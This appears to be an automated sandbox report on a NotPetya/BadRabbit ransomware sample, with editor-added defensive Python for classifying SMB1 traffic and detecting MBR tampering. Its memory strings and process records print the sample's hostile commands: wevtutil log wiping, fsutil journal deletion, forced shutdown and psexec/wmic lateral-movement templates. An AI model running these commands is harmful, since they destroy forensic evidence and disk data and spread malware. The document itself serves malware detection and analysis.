Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E51973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose, 1_2_02E51973

            Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.168.2.0 139
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.168.2.1 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 173.222.162.32 445
Source: global traffic | TCP traffic: 192.168.2.4:49675 -> 173.222.162.32:443
Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Yara match | File source: C:\Windows\dllhost.dat, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.4:49742 -> 173.222.162.32:139
Source: rundll32.exe, 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.168.2.1/
Source: rundll32.exe, 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.168.2.1/#=
Source: rundll32.exe, 00000001.00000002.1670751144.0000000004D52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.168.2.1:80/
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E567AF memset,select,recv,htons,recv, 1_2_02E567AF
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32 (reported 9 times)
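The connections to ports 139 and 445 above, together with the `mov dword ptr [esi+04h], 424D53FFh` instruction in the AV Detection section (the signature "Contains functionality to create an SMB header"), are the sample building its own SMBv1 frames for the EternalBlue spreader: 0x424D53FF stored little-endian is the byte sequence `FF 53 4D 42`, i.e. `\xffSMB`. The parser below is an added example by the editor, not code from the report. It builds a NetBIOS-framed SMB1 message the way the malware's header builder would and classifies captured TCP payloads to 139/445 as SMB1 (with the command), SMB2 or neither. The sample negotiate body and the SMB2 stub are constructed; the command-name table covers only the commands a practitioner cares about here.

```python
import struct
from typing import Dict, Optional

SMB1_MAGIC = b"\xffSMB"   # 0x424D53FF as a little-endian dword, the constant in the report
SMB2_MAGIC = b"\xfeSMB"
SMB1_HDR = "<4sBIBHH8sHHHHH"  # 32-byte SMB1 header (MS-CIFS 2.2.3.1)
SMB1_COMMANDS = {
    0x25: "SMB_COM_TRANSACTION",
    0x32: "SMB_COM_TRANSACTION2",
    0x72: "SMB_COM_NEGOTIATE",
    0x73: "SMB_COM_SESSION_SETUP_ANDX",
    0x75: "SMB_COM_TREE_CONNECT_ANDX",
    0xA0: "SMB_COM_NT_TRANSACT",
}

# Constructed SMB_COM_NEGOTIATE request body: WordCount 0, ByteCount 12,
# one dialect string "NT LM 0.12" (0x02 prefix, NUL terminated).
NEGOTIATE_BODY = b"\x00" + struct.pack("<H", 12) + b"\x02NT LM 0.12\x00"


def build_smb1_message(command: int, body: bytes = b"", tid: int = 0,
                       pid: int = 0xFEFF, uid: int = 0, mid: int = 0) -> bytes:
    """Return a complete on-the-wire SMB1 message: 4-byte NetBIOS session
    framing (type 0x00 + 24-bit big-endian length), then the 32-byte header
    and the command body."""
    header = struct.pack(
        SMB1_HDR, SMB1_MAGIC, command,
        0,          # NT status
        0x18,       # Flags: canonical pathnames, case-insensitive
        0xC853,     # Flags2: unicode, NT status, extended security, long names
        0,          # PIDHigh
        b"\x00" * 8,  # SecurityFeatures (signature), unsigned here
        0,          # Reserved
        tid, pid, uid, mid)
    payload = header + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def parse_smb(segment: bytes) -> Optional[Dict[str, object]]:
    """Classify the first message of a TCP payload sent to 139/445.
    Returns None for anything that is not NetBIOS-framed SMB."""
    if len(segment) < 4 or segment[0] != 0x00:          # 0x00 = session message
        return None
    length = int.from_bytes(segment[1:4], "big")
    msg = segment[4:4 + length]
    if msg.startswith(SMB2_MAGIC):
        return {"version": 2, "length": length}
    if not msg.startswith(SMB1_MAGIC) or len(msg) < 32:
        return None
    f = struct.unpack(SMB1_HDR, msg[:32])
    return {"version": 1, "length": length, "command": f[1],
            "name": SMB1_COMMANDS.get(f[1], f"0x{f[1]:02x}"),
            "tid": f[8], "uid": f[10], "mid": f[11]}


if __name__ == "__main__":
    wire = build_smb1_message(0x72, NEGOTIATE_BODY)
    print(wire[:8].hex(" "), parse_smb(wire))
    print(parse_smb(b"\x00\x00\x00\x40" + SMB2_MAGIC + b"\x00" * 60))
    print(parse_smb(b"GET / HTTP/1.1\r\n"))
```

On a current Windows estate any SMB1 negotiate on the wire is worth an alert on its own, since SMBv1 is deprecated and not installed by default on recent Windows 10 and Server releases; a client that negotiates only "NT LM 0.12" and then sends SMB_COM_TRANSACTION2 or SMB_COM_NT_TRANSACT to many hosts in a /24 is the traffic shape of the EternalBlue scan this sample performs.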

            Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: p2pWin.exe, type: SAMPLE
Source: Yara match | File source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: p2pWin.exe PID: 5320, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E53CA0
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E51BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree, 1_2_02E51BA0

            Operating System Destruction

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E58CBF CreateFileA on filename \\.\PhysicalDrive0 1_2_02E58CBF
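Opening `\\.\PhysicalDrive0` with CreateFileA is how the sample reaches sector 0 to replace the MBR (the "Writes directly to the primary disk partition (DR0)" and "Infects the VBR" signatures). The triage check below is an added example by the editor, not part of the report: it splits sector 0 into bootstrap code, partition table and 0x55AA signature, and flags a disk whose bootstrap code no longer matches a hash recorded from a known-good image of the same build. Both sectors used in the demo are synthetic, constructed in the code, and the "vendor" boot-code bytes are placeholders; the function names are the editor's.

```python
import hashlib
import struct
from typing import Dict, List

SECTOR = 512
BOOT_SIGNATURE = b"\x55\xaa"


def parse_mbr(sector0: bytes) -> Dict[str, object]:
    """Split sector 0 into bootstrap code (bytes 0-439), the four 16-byte
    partition entries (446-509) and the 0x55AA signature (510-511)."""
    if len(sector0) < SECTOR:
        raise ValueError("need a full 512-byte sector")
    partitions: List[Dict[str, int]] = []
    for i in range(4):
        status, _chs_first, ptype, _chs_last, lba_start, sectors = struct.unpack(
            "<B3sB3sII", sector0[446 + 16 * i: 462 + 16 * i])
        if ptype != 0:                              # 0x00 = empty slot
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "bootcode_sha256": hashlib.sha256(sector0[:440]).hexdigest(),
        "partitions": partitions,
        "signature_ok": sector0[510:512] == BOOT_SIGNATURE,
    }


def mbr_tampered(sector0: bytes, baseline_bootcode_sha256: str) -> bool:
    """True when the boot signature is missing or the bootstrap code differs
    from the hash recorded from a known-good disk of the same Windows build."""
    info = parse_mbr(sector0)
    return (not info["signature_ok"]) or info["bootcode_sha256"] != baseline_bootcode_sha256


def _constructed_mbr(bootcode: bytes) -> bytes:
    """Synthetic 512-byte sector for the demo: one active type-0x07 partition
    at LBA 2048, remaining slots empty. Not a real disk image."""
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 1_000_000)
    return bootcode.ljust(440, b"\x90") + b"\x00" * 6 + entry + b"\x00" * 48 + BOOT_SIGNATURE


CLEAN_MBR = _constructed_mbr(b"\xfa\x33\xc0\x8e\xd0")            # stand-in for vendor boot code
BASELINE = parse_mbr(CLEAN_MBR)["bootcode_sha256"]               # recorded before the incident
OVERWRITTEN_MBR = _constructed_mbr(b"\xfa\xea\x00\x7c\x00\x00")  # foreign boot code, same table

if __name__ == "__main__":
    for name, img in (("clean", CLEAN_MBR), ("overwritten", OVERWRITTEN_MBR)):
        verdict = "TAMPERED" if mbr_tampered(img, BASELINE) else "matches baseline"
        print(name, verdict, parse_mbr(img)["partitions"])
```

On a live Windows host the sector comes from the same device the malware opened, `open(r"\\.\PhysicalDrive0", "rb").read(512)` from an elevated prompt; on an image, from offset 0. The partition table is deliberately left out of the hash so that a bootkit which keeps the table intact (as this family does, so the system still "boots" into the fake CHKDSK screen) is still caught by the bootstrap-code comparison. The VBR is the first sector of the partition at `lba_start`, and the same hash-against-baseline check applies to it.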

            System Summary

Source: p2pWin.exe, type: SAMPLE | Matched rule: Detects BadRabbit Ransomware | Author: Florian Roth
Source: p2pWin.exe, type: SAMPLE | Matched rule: Detects new NotPetya Ransomware variant from June 2017 | Author: Florian Roth
Source: p2pWin.exe, type: SAMPLE | Matched rule: probable petya ransomware using eternalblue, wmic, psexec | Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: p2pWin.exe, type: SAMPLE | Matched rule: rule to hit on the xored doublepulsar shellcode | Author: patrick jones
Source: p2pWin.exe, type: SAMPLE | Matched rule: rule to hit on the xored doublepulsar dll injection shellcode | Author: patrick jones
Source: p2pWin.exe, type: SAMPLE | Matched rule: Win32_Ransomware_NotPetya | Author: ReversingLabs
Source: 0.2.p2pWin.exe.4d890.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects new NotPetya Ransomware variant from June 2017 | Author: Florian Roth
Source: 0.1.p2pWin.exe.4c050.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects new NotPetya Ransomware variant from June 2017 | Author: Florian Roth
Source: 0.1.p2pWin.exe.4d890.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects new NotPetya Ransomware variant from June 2017 | Author: Florian Roth
Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPE | Matched rule: Detects BadRabbit Ransomware | Author: Florian Roth
Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPE | Matched rule: Detects new NotPetya Ransomware variant from June 2017 | Author: Florian Roth
Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPE | Matched rule: probable petya ransomware using eternalblue, wmic, psexec | Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPE | Matched rule: rule to hit on the xored doublepulsar shellcode | Author: patrick jones
Source: 1.2.rundll32.exe.2ce5020.2.unpack, type: UNPACKEDPE | Matched rule: rule to hit on the xored doublepulsar dll injection shellcode | Author: patrick jones
Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPE | Matched rule: Detects BadRabbit Ransomware | Author: Florian Roth
Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPE | Matched rule: Detects new NotPetya Ransomware variant from June 2017 | Author: Florian Roth
Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPE | Matched rule: probable petya ransomware using eternalblue, wmic, psexec | Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPE | Matched rule: rule to hit on the xored doublepulsar shellcode | Author: patrick jones
Source: 0.1.p2pWin.exe.37830.0.unpack, type: UNPACKEDPE | Matched rule: rule to hit on the xored doublepulsar dll injection shellcode | Author: patrick jones
Source: 4.0.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPE | Matched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 | Author: Florian Roth
Source: 0.0.p2pWin.exe.4c050.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects new NotPetya Ransomware variant from June 2017 | Author: Florian Roth
            Source: 1.2.rundll32.exe.2cf9840.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2e67860.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.0.p2pWin.exe.4d890.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2cfb080.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.2.p2pWin.exe.4c050.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 4.2.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 Author: Florian Roth
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya Author: ReversingLabs
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar shellcode Author: patrick user
            Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: rule to hit on the xored doublepulsar dll injection shellcode Author: patrick user
            Source: Process Memory Space: p2pWin.exe PID: 5320, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
            Source: C:\Windows\SysWOW64\rundll32.exe Hard error raised: shutdown
            Source: p2pWin.exe, 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: -h "%ws:%ws"%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhostSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilegeC:\Windows\/c %wsComSpec\cmd.exewevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02dat %02d:%02d %wsshutdown.exe /r /f/RU "SYSTEM" dllhost.datntdll.dllNtRaiseHardError\\.\C:\\.\PhysicalDrive0255.255.255.255%u.%u.%u.%u%s \\%s -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 wbem\wmic.exe%s /node:"%ws" /user:"%ws" /password:"%ws" process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "\\%s\admin$\\%ws\admin$\%wsmemstr_e9299c95-9
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_02E55A7E 1_2_02E55A7E
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_02E5C6D0 1_2_02E5C6D0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_02E522A2 1_2_02E522A2
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_02E5AEAD 1_2_02E5AEAD
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_02E5A5CC 1_2_02E5A5CC
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_02E5BF73 1_2_02E5BF73
            Source: C:\Users\user\AppData\Local\Temp\F2CD.tmp Code function: 4_2_00007FF72E905C78 4_2_00007FF72E905C78
